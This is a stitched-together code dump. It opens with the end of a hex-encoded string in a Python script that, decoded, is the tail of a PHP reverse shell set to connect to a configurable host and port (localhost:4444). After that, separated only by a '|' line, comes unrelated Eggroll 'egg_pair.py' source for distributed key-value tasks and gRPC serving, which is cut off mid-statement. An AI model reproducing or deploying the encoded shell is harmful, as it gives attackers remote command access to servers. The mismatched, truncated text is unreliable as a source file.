020202020202020202020202020202020202f2f202d2d2d2d2d2d20574f524b20454e44202d2d2d2d2d2d0a0a2020202020202020202020202020202020202020666f7265616368202824706970657320617320247069706529207b0a20202020202020202020202020202020202020202020202066636c6f7365282470697065293b0a20202020202020202020202020202020202020207d0a202020202020202020202020202020202020202070726f635f636c6f7365282470726f63657373293b0a202020202020202020202020202020207d0a202020202020202020202020202020202f2f202d2d2d2d2d2d205348454c4c20454e44202d2d2d2d2d2d0a0a2020202020202020202020202020202066636c6f73652824736f636b65
74293b0a2020202020202020202020207d0a2020202020202020202020202f2f202d2d2d2d2d2d20534f434b455420454e44202d2d2d2d2d2d0a0a20202020202020207d0a202020207d0a7d0a6563686f20273c7072653e273b0a2f2f206368616e67652074686520686f7374206164647265737320616e642f6f7220706f7274206e756d626572206173206e65636573736172790a247368203d206e6577205368656c6c28276c6f63616c686f7374272c2034343434293b0a2473682d3e72756e28293b0a756e73657428247368293b0a2f2f206761726261676520636f6c6c6563746f72207265717569726573205048502076352e332e30206f7220677265617465720a2f2f204067635f636f6c6c6563745f6379636c657328293b0a6563686f20273c2f7072653e273b0a3f3e'
# Script entry point.
if __name__ == '__main__':
    main()
|
egg_pair.py | # -*- coding: utf-8 -*-
# Copyright (c) 2019 - now, Eggroll Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import configparser
import gc
import logging
import os
import platform
import shutil
import signal
import threading
import time
import mmh3
from collections.abc import Iterable
import grpc
import numpy as np
from eggroll.core.client import ClusterManagerClient
from eggroll.core.command.command_router import CommandRouter
from eggroll.core.command.command_service import CommandServicer
from eggroll.core.conf_keys import SessionConfKeys, \
ClusterManagerConfKeys, RollPairConfKeys, CoreConfKeys
from eggroll.core.constants import ProcessorTypes, ProcessorStatus, SerdesTypes
from eggroll.core.datastructure import create_executor_pool
from eggroll.core.datastructure.broker import FifoBroker
from eggroll.core.grpc.factory import GrpcChannelFactory
from eggroll.core.meta_model import ErPair
from eggroll.core.meta_model import ErTask, ErProcessor, ErEndpoint
from eggroll.core.proto import command_pb2_grpc, transfer_pb2_grpc
from eggroll.core.transfer.transfer_service import GrpcTransferServicer, \
TransferService
from eggroll.core.utils import _exception_logger, add_runtime_storage
from eggroll.core.utils import hash_code
from eggroll.core.utils import set_static_er_conf, get_static_er_conf
from eggroll.roll_pair import create_adapter, create_serdes, create_functor
from eggroll.roll_pair.task.storage import PutBatchTask
from eggroll.roll_pair.transfer_pair import BatchBroker
from eggroll.roll_pair.transfer_pair import TransferPair
from eggroll.roll_pair.utils.pair_utils import generator, partitioner, \
set_data_dir
from eggroll.utils.log_utils import get_logger
from eggroll.utils.profile import get_system_metric
# Module-level logger shared by this egg_pair worker.
L = get_logger()
class EggPair(object):
def __init__(self):
    # Serdes used to (de)serialize functor bodies and result key/values
    # exchanged with callers (cloudpickle-based).
    self.functor_serdes = create_serdes(SerdesTypes.CLOUD_PICKLE)
def __partitioner(self, hash_func, total_partitions):
return lambda k: hash_func(k) % total_partitions
def _run_unary(self, func, task, shuffle=False, reduce_op=None):
    """Execute a single-input task, with or without a shuffle stage.

    func: callable(input_iterator, key_serdes, value_serdes, output_sink).
        Without shuffle the sink is a write batch on the output store; with
        shuffle it is a BatchBroker feeding the scatter stage.
    shuffle: when True, func's output is scattered to the output partitions
        via a TransferPair and collected by a store-broker future.
    reduce_op: optional combiner forwarded to the store side of the shuffle.
    Raises ValueError when input and output serdes differ (no on-the-fly
    serdes conversion is supported).
    """
    input_store_head = task._job._inputs[0]
    output_store_head = task._job._outputs[0]
    # NOTE(review): key and value serdes are created from the same
    # store-locator serdes id — presumably keys and values share one serdes.
    input_key_serdes = create_serdes(input_store_head._store_locator._serdes)
    input_value_serdes = create_serdes(input_store_head._store_locator._serdes)
    output_key_serdes = create_serdes(output_store_head._store_locator._serdes)
    output_value_serdes = create_serdes(output_store_head._store_locator._serdes)
    if input_key_serdes != output_key_serdes or \
            input_value_serdes != output_value_serdes:
        raise ValueError(f"input key-value serdes:{(input_key_serdes, input_value_serdes)}"
                         f"differ from output key-value serdes:{(output_key_serdes, output_value_serdes)}")
    if shuffle:
        from eggroll.roll_pair.transfer_pair import TransferPair
        input_total_partitions = input_store_head._store_locator._total_partitions
        output_total_partitions = output_store_head._store_locator._total_partitions
        output_store = output_store_head
        my_server_node_id = get_static_er_conf().get('server_node_id', None)
        shuffler = TransferPair(transfer_id=task._job._id)
        # Only start a store broker when this node actually owns the
        # task's output partition.
        if not task._outputs or \
                (my_server_node_id is not None
                 and my_server_node_id != task._outputs[0]._processor._server_node_id):
            store_future = None
        else:
            store_future = shuffler.store_broker(
                store_partition=task._outputs[0],
                is_shuffle=True,
                total_writers=input_total_partitions,
                reduce_op=reduce_op)
        # Only scatter when this node owns the task's input partition.
        if not task._inputs or \
                (my_server_node_id is not None
                 and my_server_node_id != task._inputs[0]._processor._server_node_id):
            scatter_future = None
        else:
            shuffle_broker = FifoBroker()
            write_bb = BatchBroker(shuffle_broker)
            try:
                scatter_future = shuffler.scatter(
                    input_broker=shuffle_broker,
                    partition_function=partitioner(hash_func=mmh3.hash, total_partitions=output_total_partitions),
                    output_store=output_store)
                # Drive func over the local input partition; it feeds the broker.
                with create_adapter(task._inputs[0]) as input_db, \
                        input_db.iteritems() as rb:
                    func(rb, input_key_serdes, input_value_serdes, write_bb)
            finally:
                # Always close the broker so the scatter side can terminate.
                write_bb.signal_write_finish()
        # Block until both sides of the shuffle have drained.
        if scatter_future:
            scatter_results = scatter_future.result()
        else:
            scatter_results = 'no scatter for this partition'
        if store_future:
            store_results = store_future.result()
        else:
            store_results = 'no store for this partition'
    else:  # no shuffle: stream straight from input partition to output write batch
        with create_adapter(task._inputs[0]) as input_db, \
                input_db.iteritems() as rb, \
                create_adapter(task._outputs[0], options=task._job._options) as db, \
                db.new_batch() as wb:
            func(rb, input_key_serdes, input_value_serdes, wb)
    L.trace(f"close_store_adatper:{task._inputs[0]}")
def _run_binary(self, func, task):
    """Execute a two-input task (e.g. join) over the left/right partitions.

    func: callable(left_iter, left_key_serdes, left_value_serdes,
                   right_iter, right_key_serdes, right_value_serdes,
                   output_writebatch).
    Raises ValueError when the left input serdes differ from the output
    serdes (no on-the-fly conversion), and EnvironmentError (chained to the
    original exception) when func itself fails.
    """
    # NOTE(review): key and value serdes come from the same store-locator
    # serdes id — presumably keys and values share one serdes type.
    left_key_serdes = create_serdes(task._inputs[0]._store_locator._serdes)
    left_value_serdes = create_serdes(task._inputs[0]._store_locator._serdes)
    right_key_serdes = create_serdes(task._inputs[1]._store_locator._serdes)
    right_value_serdes = create_serdes(task._inputs[1]._store_locator._serdes)
    output_key_serdes = create_serdes(task._outputs[0]._store_locator._serdes)
    output_value_serdes = create_serdes(task._outputs[0]._store_locator._serdes)
    if left_key_serdes != output_key_serdes or \
            left_value_serdes != output_value_serdes:
        raise ValueError(f"input key-value serdes:{(left_key_serdes, left_value_serdes)}"
                         f"differ from output key-value serdes:{(output_key_serdes, output_value_serdes)}")
    with create_adapter(task._inputs[0]) as left_adapter, \
            create_adapter(task._inputs[1]) as right_adapter, \
            create_adapter(task._outputs[0]) as output_adapter, \
            left_adapter.iteritems() as left_iterator, \
            right_adapter.iteritems() as right_iterator, \
            output_adapter.new_batch() as output_writebatch:
        try:
            func(left_iterator, left_key_serdes, left_value_serdes,
                 right_iterator, right_key_serdes, right_value_serdes,
                 output_writebatch)
        except Exception as e:
            # Fix: the previous 2-arg EnvironmentError(msg, e) abused the
            # OSError(errno, strerror) form — the message landed in the errno
            # slot and the cause was never chained. Chain it properly instead.
            raise EnvironmentError(f"exec task:{task} error") from e
@_exception_logger
def run_task(self, task: ErTask):
if L.isEnabledFor(logging.TRACE):
L.trace(
f'[RUNTASK] start. task_name={task._name}, inputs={task._inputs}, outputs={task._outputs}, task_id={task._id}')
else:
L.debug(f'[RUNTASK] start. task_name={task._name}, task_id={task._id}')
functors = task._job._functors
result = task
if task._name == 'get':
# TODO:1: move to create_serdes
f = create_functor(functors[0]._body)
with create_adapter(task._inputs[0]) as input_adapter:
L.trace(f"get: key: {self.functor_serdes.deserialize(f._key)}, path: {input_adapter.path}")
value = input_adapter.get(f._key)
result = ErPair(key=f._key, value=value)
elif task._name == 'getAll':
tag = f'{task._id}'
er_pair = create_functor(functors[0]._body)
input_store_head = task._job._inputs[0]
key_serdes = create_serdes(input_store_head._store_locator._serdes)
def generate_broker():
with create_adapter(task._inputs[0]) as db, db.iteritems() as rb:
limit = None if er_pair._key is None else key_serdes.deserialize(er_pair._key)
try:
yield from TransferPair.pair_to_bin_batch(rb, limit=limit)
finally:
TransferService.remove_broker(tag)
TransferService.set_broker(tag, generate_broker())
elif task._name == 'count':
with create_adapter(task._inputs[0]) as input_adapter:
result = ErPair(key=self.functor_serdes.serialize('result'),
value=self.functor_serdes.serialize(input_adapter.count()))
elif task._name == 'putBatch':
partition = task._outputs[0]
tag = f'{task._id}'
PutBatchTask(tag, partition).run()
elif task._name == 'putAll':
output_partition = task._outputs[0]
tag = f'{task._id}'
L.trace(f'egg_pair putAll: transfer service tag={tag}')
tf = TransferPair(tag)
store_broker_result = tf.store_broker(output_partition, False).result()
# TODO:2: should wait complete?, command timeout?
elif task._name == 'put':
f = create_functor(functors[0]._body)
with create_adapter(task._inputs[0]) as input_adapter:
value = input_adapter.put(f._key, f._value)
# result = ErPair(key=f._key, value=bytes(value))
elif task._name == 'destroy':
input_store_locator = task._inputs[0]._store_locator
namespace = input_store_locator._namespace
name = input_store_locator._name
store_type = input_store_locator._store_type
L.debug(f'destroying store_type={store_type}, namespace={namespace}, name={name}')
if name == '*':
from eggroll.roll_pair.utils.pair_utils import get_db_path, get_data_dir
target_paths = list()
if store_type == '*':
data_dir = get_data_dir()
store_types = os.listdir(data_dir)
for store_type in store_types:
target_paths.append('/'.join([data_dir, store_type, namespace]))
else:
db_path = get_db_path(task._inputs[0])
target_paths.append(db_path[:db_path.rfind('*')])
real_data_dir = os.path.realpath(get_data_dir())
for path in target_paths:
realpath = os.path.realpath(path)
if os.path.exists(path):
if realpath == "/" \
or realpath == real_data_dir \
or not realpath.startswith(real_data_dir):
raise ValueError(f'trying to delete a dangerous path: {realpath}')
else:
shutil.rmtree(path)
else:
options = task._job._options
with create_adapter(task._inputs[0], options=options) as input_adapter:
input_adapter.destroy(options=options)
elif task._name == 'delete':
f = create_functor(functors[0]._body)
with create_adapter(task._inputs[0]) as input_adapter:
if input_adapter.delete(f._key):
L.trace("delete k success")
elif task._name == 'mapValues':
f = create_functor(functors[0]._body)
def map_values_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
for k_bytes, v_bytes in input_iterator:
v = value_serdes.deserialize(v_bytes)
output_writebatch.put(k_bytes, value_serdes.serialize(f(v)))
self._run_unary(map_values_wrapper, task)
elif task._name == 'map':
f = create_functor(functors[0]._body)
def map_wrapper(input_iterator, key_serdes, value_serdes, shuffle_broker):
for k_bytes, v_bytes in input_iterator:
k1, v1 = f(key_serdes.deserialize(k_bytes), value_serdes.deserialize(v_bytes))
shuffle_broker.put((key_serdes.serialize(k1), value_serdes.serialize(v1)))
self._run_unary(map_wrapper, task, shuffle=True)
elif task._name == 'reduce':
seq_op_result = self.aggregate_seq(task=task)
result = ErPair(key=self.functor_serdes.serialize(task._inputs[0]._id),
value=self.functor_serdes.serialize(seq_op_result))
elif task._name == 'aggregate':
seq_op_result = self.aggregate_seq(task=task)
result = ErPair(key=self.functor_serdes.serialize(task._inputs[0]._id),
value=self.functor_serdes.serialize(seq_op_result))
elif task._name == 'mapPartitions':
reduce_op = create_functor(functors[1]._body)
shuffle = create_functor(functors[2]._body)
def map_partitions_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
value = f(generator(key_serdes, value_serdes, input_iterator))
if isinstance(value, Iterable):
for k1, v1 in value:
if shuffle:
output_writebatch.put((key_serdes.serialize(k1), value_serdes.serialize(v1)))
else:
output_writebatch.put(key_serdes.serialize(k1), value_serdes.serialize(v1))
else:
key = input_iterator.key()
output_writebatch.put((key, value_serdes.serialize(value)))
self._run_unary(map_partitions_wrapper, task, shuffle=shuffle, reduce_op=reduce_op)
elif task._name == 'collapsePartitions':
def collapse_partitions_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
value = f(generator(key_serdes, value_serdes, input_iterator))
if input_iterator.last():
key = input_iterator.key()
output_writebatch.put(key, value_serdes.serialize(value))
self._run_unary(collapse_partitions_wrapper, task)
elif task._name == 'mapPartitionsWithIndex':
partition_id = task._inputs[0]._id
shuffle = create_functor(functors[1]._body)
def map_partitions_with_index_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
value = f(partition_id, generator(key_serdes, value_serdes, input_iterator))
if isinstance(value, Iterable):
for k1, v1 in value:
if shuffle:
output_writebatch.put((key_serdes.serialize(k1), value_serdes.serialize(v1)))
else:
output_writebatch.put(key_serdes.serialize(k1), value_serdes.serialize(v1))
else:
key = input_iterator.key()
output_writebatch.put((key, value_serdes.serialize(value)))
self._run_unary(map_partitions_with_index_wrapper, task, shuffle=shuffle)
elif task._name == 'flatMap':
shuffle = create_functor(functors[1]._body)
def flat_map_wraaper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
for k1, v1 in input_iterator:
for k2, v2 in f(key_serdes.deserialize(k1), value_serdes.deserialize(v1)):
if shuffle:
output_writebatch.put((key_serdes.serialize(k2), value_serdes.serialize(v2)))
else:
output_writebatch.put(key_serdes.serialize(k2), value_serdes.serialize(v2))
self._run_unary(flat_map_wraaper, task, shuffle=shuffle)
elif task._name == 'glom':
def glom_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
k_tmp = None
v_list = []
for k, v in input_iterator:
v_list.append((key_serdes.deserialize(k), value_serdes.deserialize(v)))
k_tmp = k
if k_tmp is not None:
output_writebatch.put(k_tmp, value_serdes.serialize(v_list))
self._run_unary(glom_wrapper, task)
elif task._name == 'sample':
def sample_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
fraction = create_functor(functors[0]._body)
seed = create_functor(functors[1]._body)
input_iterator.first()
random_state = np.random.RandomState(seed)
for k, v in input_iterator:
if random_state.rand() < fraction:
output_writebatch.put(k, v)
self._run_unary(sample_wrapper, task)
elif task._name == 'filter':
def filter_wrapper(input_iterator, key_serdes, value_serdes, output_writebatch):
f = create_functor(functors[0]._body)
for k, v in input_iterator:
if f(key_serdes.deserialize(k), value_serdes.deserialize(v)):
output_writebatch.put(k, v)
self._run_unary(filter_wrapper, task)
elif task._name == 'join':
def merge_join_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
if not left_iterator.adapter.is_sorted() or not right_iterator.adapter.is_sorted():
raise RuntimeError(f"merge join cannot be applied: not both store types support sorting. "
f"left type: {type(left_iterator.adapter)}, is_sorted: {left_iterator.adapter.is_sorted()}; "
f"right type: {type(right_iterator.adapter)}, is_sorted: {right_iterator.adapter.is_sorted()}")
f = create_functor(functors[0]._body)
is_same_serdes = left_key_serdes == right_key_serdes
l_iter = iter(left_iterator)
r_iter = iter(right_iterator)
try:
k_left, v_left_bytes = next(l_iter)
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while True:
while k_right < k_left:
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while k_left < k_right:
k_left, v_left_bytes = next(l_iter)
if k_left == k_right:
output_writebatch.put(k_left,
left_value_serdes.serialize(
f(left_value_serdes.deserialize(v_left_bytes),
right_value_serdes.deserialize(v_right_bytes))))
k_left, v_left_bytes = next(l_iter)
# skips next(r_iter) to avoid duplicate codes for the 3rd time
except StopIteration as e:
return
def hash_join_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
f = create_functor(functors[0]._body)
is_diff_serdes = type(left_key_serdes) != type(right_key_serdes)
for k_left, l_v_bytes in left_iterator:
if is_diff_serdes:
k_left = right_key_serdes.serialize(left_key_serdes.deserialize(k_left))
r_v_bytes = right_iterator.adapter.get(k_left)
if r_v_bytes:
output_writebatch.put(k_left,
left_value_serdes.serialize(
f(left_value_serdes.deserialize(l_v_bytes),
right_value_serdes.deserialize(r_v_bytes))))
join_type = task._job._options.get('join_type', 'merge')
if join_type == 'merge':
self._run_binary(merge_join_wrapper, task)
else:
self._run_binary(hash_join_wrapper, task)
elif task._name == 'subtractByKey':
def merge_subtract_by_key_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
if not left_iterator.adapter.is_sorted() or not right_iterator.adapter.is_sorted():
raise RuntimeError(
f"merge subtract_by_key cannot be applied: not both store types support sorting. "
f"left type: {type(left_iterator.adapter)}, is_sorted: {left_iterator.adapter.is_sorted()}; "
f"right type: {type(right_iterator.adapter)}, is_sorted: {right_iterator.adapter.is_sorted()}")
is_same_serdes = left_key_serdes == right_key_serdes
l_iter = iter(left_iterator)
r_iter = iter(right_iterator)
is_left_stopped = False
is_equal = False
try:
k_left, v_left = next(l_iter)
except StopIteration:
is_left_stopped = True
k_left = None
v_left = None
try:
k_right_raw, v_right = next(r_iter)
except StopIteration:
is_left_stopped = False
k_right_raw = None
v_right = None
# left is None, output must be None
if k_left is None:
return
try:
if k_left is None:
raise StopIteration()
if k_right_raw is None:
raise StopIteration()
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while True:
is_left_stopped = False
if k_left < k_right:
output_writebatch.put(k_left, v_left)
k_left, v_left = next(l_iter)
is_left_stopped = True
elif k_left == k_right:
is_equal = True
is_left_stopped = True
k_left, v_left = next(l_iter)
is_left_stopped = False
is_equal = False
k_right_raw, v_right = next(r_iter)
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
else:
k_right_raw, v_right = next(r_iter)
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
is_left_stopped = True
except StopIteration as e:
pass
if not is_left_stopped and not is_equal:
try:
if k_left is not None and v_left is not None:
output_writebatch.put(k_left, v_left)
while True:
k_left, v_left = next(l_iter)
output_writebatch.put(k_left, v_left)
except StopIteration as e:
pass
elif is_left_stopped and not is_equal and k_left is not None:
output_writebatch.put(k_left, v_left)
return
def hash_subtract_by_key_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
is_diff_serdes = type(left_key_serdes) != type(right_key_serdes)
for k_left, v_left in left_iterator:
if is_diff_serdes:
k_left = right_key_serdes.serialize(left_key_serdes.deserialize(k_left))
v_right = right_iterator.adapter.get(k_left)
if v_right is None:
output_writebatch.put(k_left, v_left)
subtract_by_key_type = task._job._options.get('subtract_by_key_type', 'merge')
if subtract_by_key_type == 'merge':
self._run_binary(merge_subtract_by_key_wrapper, task)
else:
self._run_binary(hash_subtract_by_key_wrapper, task)
elif task._name == 'union':
def merge_union_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
if not left_iterator.adapter.is_sorted() or not right_iterator.adapter.is_sorted():
raise RuntimeError(f"merge union cannot be applied: not both store types support sorting. "
f"left type: {type(left_iterator.adapter)}, is_sorted: {left_iterator.adapter.is_sorted()}; "
f"right type: {type(right_iterator.adapter)}, is_sorted: {right_iterator.adapter.is_sorted()}")
f = create_functor(functors[0]._body)
is_same_serdes = left_key_serdes == right_key_serdes
l_iter = iter(left_iterator)
r_iter = iter(right_iterator)
k_left = None
v_left_bytes = None
k_right = None
v_right_bytes = None
none_none = (None, None)
is_left_stopped = False
is_equal = False
try:
k_left, v_left_bytes = next(l_iter, none_none)
k_right_raw, v_right_bytes = next(r_iter, none_none)
if k_left is None and k_right_raw is None:
return
elif k_left is None:
is_left_stopped = True
raise StopIteration()
elif k_right_raw is None:
is_left_stopped = False
raise StopIteration()
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
while True:
is_left_stopped = False
while k_right < k_left:
if is_same_serdes:
output_writebatch.put(k_right, v_right_bytes)
else:
output_writebatch.put(k_right, left_value_serdes.serialize(
right_value_serdes.deserialize(v_right_bytes)))
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
is_left_stopped = True
while k_left < k_right:
output_writebatch.put(k_left, v_left_bytes)
k_left, v_left_bytes = next(l_iter)
if k_left == k_right:
is_equal = True
output_writebatch.put(k_left,
left_value_serdes.serialize(
f(left_value_serdes.deserialize(v_left_bytes),
right_value_serdes.deserialize(v_right_bytes))))
is_left_stopped = True
k_left, v_left_bytes = next(l_iter)
is_left_stopped = False
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
k_right = k_right_raw
else:
k_right = left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw))
is_equal = False
except StopIteration as e:
pass
if not is_left_stopped:
try:
output_writebatch.put(k_left, v_left_bytes)
while True:
k_left, v_left_bytes = next(l_iter)
output_writebatch.put(k_left, v_left_bytes)
except StopIteration as e:
pass
else:
try:
if not is_equal:
if is_same_serdes:
output_writebatch.put(k_right_raw, v_right_bytes)
else:
output_writebatch.put(
left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw)),
left_value_serdes.serialize(right_value_serdes.deserialize(v_right_bytes)))
while True:
k_right_raw, v_right_bytes = next(r_iter)
if is_same_serdes:
output_writebatch.put(k_right_raw, v_right_bytes)
else:
output_writebatch.put(
left_key_serdes.serialize(right_key_serdes.deserialize(k_right_raw)),
left_value_serdes.serialize(right_value_serdes.deserialize(v_right_bytes)))
except StopIteration as e:
pass
# end of merge union wrapper
return
def hash_union_wrapper(left_iterator, left_key_serdes, left_value_serdes,
right_iterator, right_key_serdes, right_value_serdes,
output_writebatch):
f = create_functor(functors[0]._body)
is_diff_serdes = type(left_key_serdes) != type(right_key_serdes)
for k_left, v_left in left_iterator:
if is_diff_serdes:
k_left = right_key_serdes.serialize(left_key_serdes.deserialize(k_left))
v_right = right_iterator.adapter.get(k_left)
if v_right is None:
output_writebatch.put(k_left, v_left)
else:
v_final = f(left_value_serdes.deserialize(v_left),
right_value_serdes.deserialize(v_right))
output_writebatch.put(k_left, left_value_serdes.serialize(v_final))
right_iterator.first()
for k_right, v_right in right_iterator:
if is_diff_serdes:
final_v_bytes = output_writebatch.get(left_key_serdes.serialize(
right_key_serdes.deserialize(k_right)))
else:
final_v_bytes = output_writebatch.get(k_right)
if final_v_bytes is None:
output_writebatch.put(k_right, v_right)
union_type = task._job._options.get('union_type', 'merge')
if union_type == 'merge':
self._run_binary(merge_union_wrapper, task)
else:
self._run_binary(hash_union_wrapper, task)
elif task._name == 'withStores':
f = create_functor(functors[0]._body)
result = ErPair(key=self.functor_serdes.serialize(task._inputs[0]._id),
value=self.functor_serdes.serialize(f(task)))
if L.isEnabledFor(logging.TRACE):
L.trace(
f'[RUNTASK] end. task_name={task._name}, inputs={task._inputs}, outputs={task._outputs}, task_id={task._id}')
else:
L.debug(f'[RUNTASK] end. task_name={task._name}, task_id={task._id}')
return result
# run_task ends here
def aggregate_seq(self, task: ErTask):
    """Run the job's sequential op over this task's single input partition.

    For a 'reduce' job the accumulator is seeded from the first element;
    for an 'aggregate' job it is seeded from the zero-value functor
    (functors[0]) and the sequential op is functors[1].

    Returns the partial (per-partition) aggregation result.
    """
    job_functors = task._job._functors
    is_reduce = job_functors[0]._name == 'reduce'

    # Choose the sequential operator and the starting accumulator.
    if is_reduce:
        seq_op = create_functor(job_functors[0]._body)
        accumulator = None  # seeded from the first deserialized value below
    else:
        seq_op = create_functor(job_functors[1]._body)
        accumulator = None if job_functors[0] is None else create_functor(job_functors[0]._body)

    partition = task._inputs[0]
    # Key and value share one serdes for this store; only values are needed here.
    value_serdes = create_serdes(partition._store_locator._serdes)

    seeded = False
    with create_adapter(partition) as adapter, \
            adapter.iteritems() as items:
        for _, raw_value in items:
            value = value_serdes.deserialize(raw_value)
            if is_reduce and not seeded:
                accumulator = value
                seeded = True
            else:
                accumulator = seq_op(accumulator, value)
    return accumulator
def stop_processor(cluster_manager_client: ClusterManagerClient, myself: ErProcessor):
    """Windows-only stop watchdog.

    Listens forever on a per-pid named pipe; when a message containing 'stop'
    and this process's pid arrives, marks the processor STOPPED and reports
    that status to the cluster manager via heartbeat. Started as a daemon-style
    thread from serve() when running on Windows.
    """
    # Local imports: pywin32 is only needed (and available) on Windows.
    import win32file
    import win32pipe
    L.info(f"stop_processor pid:{os.getpid()}, ppid:{os.getppid()}")
    # One pipe per process so multiple egg_pairs on one host don't collide.
    pipe_name = r'\\.\pipe\pid_pipe' + str(os.getpid())
    pipe_buffer_size = 1024
    while True:
        named_pipe = win32pipe.CreateNamedPipe(pipe_name,
                                               win32pipe.PIPE_ACCESS_DUPLEX,
                                               win32pipe.PIPE_TYPE_MESSAGE | win32pipe.PIPE_WAIT | win32pipe.PIPE_READMODE_MESSAGE,
                                               win32pipe.PIPE_UNLIMITED_INSTANCES,
                                               pipe_buffer_size,
                                               pipe_buffer_size, 500, None)
        try:
            while True:
                try:
                    # Block until a client connects, then read one message.
                    win32pipe.ConnectNamedPipe(named_pipe, None)
                    data = win32file.ReadFile(named_pipe, pipe_buffer_size, None)
                    # ReadFile returns an (hrResult, bytes) pair; guard empty reads.
                    if data is None or len(data) < 2:
                        continue
                    print('receive msg:', data)
                    cmd_str = data[1].decode('utf-8')
                    # Only honour a stop command addressed to this exact pid.
                    if 'stop' in cmd_str and str(os.getpid()) in cmd_str:
                        myself._status = ProcessorStatus.STOPPED
                        cluster_manager_client.heartbeat(myself)
                except BaseException as e:
                    # Any pipe error: drop this pipe instance and recreate it.
                    print("exception:", e)
                    break
        finally:
            try:
                win32pipe.DisconnectNamedPipe(named_pipe)
            except:
                pass
def serve(args):
    """Bring up the egg_pair processor.

    Registers the runTask command route, starts the command gRPC server (and a
    separate transfer server unless transfer_port == "-1", in which case the
    command server is shared), reports RUNNING to the cluster manager when one
    is configured, then blocks until SIGTERM/SIGINT and shuts down gracefully.
    """
    prefix = 'v1/egg-pair'
    set_data_dir(args.data_dir)
    # Route "<prefix>/runTask" commands to EggPair.run_task.
    CommandRouter.get_instance().register(
        service_name=f"{prefix}/runTask",
        route_to_module_name="eggroll.roll_pair.egg_pair",
        route_to_class_name="EggPair",
        route_to_method_name="run_task")
    max_workers = int(RollPairConfKeys.EGGROLL_ROLLPAIR_EGGPAIR_SERVER_EXECUTOR_POOL_MAX_SIZE.get())
    executor_pool_type = CoreConfKeys.EGGROLL_CORE_DEFAULT_EXECUTOR_POOL.get()
    # Command server: handles control-plane RPCs (runTask etc.).
    command_server = grpc.server(create_executor_pool(
        canonical_name=executor_pool_type,
        max_workers=max_workers,
        thread_name_prefix="eggpair-command-server"),
        options=[
            ("grpc.max_metadata_size",
             int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_METADATA_SIZE.get())),
            ('grpc.max_send_message_length',
             int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
            ('grpc.max_receive_message_length',
             int(CoreConfKeys.EGGROLL_CORE_GRPC_SERVER_CHANNEL_MAX_INBOUND_MESSAGE_SIZE.get())),
            ('grpc.keepalive_time_ms', int(CoreConfKeys.CONFKEY_CORE_GRPC_CHANNEL_KEEPALIVE_TIME_SEC.get()) * 1000),
            ('grpc.keepalive_timeout_ms',
             int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_TIMEOUT_SEC.get()) * 1000),
            ('grpc.keepalive_permit_without_calls',
             int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_KEEPALIVE_WITHOUT_CALLS_ENABLED.get())),
            ('grpc.per_rpc_retry_buffer_size',
             int(CoreConfKeys.CONFKEY_CORE_GRPC_SERVER_CHANNEL_RETRY_BUFFER_SIZE.get())),
            ('grpc.so_reuseport', False)])
    command_servicer = CommandServicer()
    command_pb2_grpc.add_CommandServiceServicer_to_server(command_servicer,
                                                          command_server)
    transfer_servicer = GrpcTransferServicer()
    port = args.port
    transfer_port = args.transfer_port
    # add_insecure_port returns the actual bound port ('0' means OS-assigned).
    port = command_server.add_insecure_port(f'[::]:{port}')
    if transfer_port == "-1":
        # Sentinel: share the command server for data transfer too.
        transfer_server = command_server
        transfer_port = port
        transfer_pb2_grpc.add_TransferServiceServicer_to_server(transfer_servicer,
                                                                transfer_server)
    else:
        # Dedicated data-plane server with its own executor pool.
        transfer_server_max_workers = int(
            RollPairConfKeys.EGGROLL_ROLLPAIR_EGGPAIR_DATA_SERVER_EXECUTOR_POOL_MAX_SIZE.get())
        transfer_server = grpc.server(create_executor_pool(
            canonical_name=executor_pool_type,
            max_workers=transfer_server_max_workers,
            thread_name_prefix="transfer_server"),
            options=[
                ('grpc.max_metadata_size',
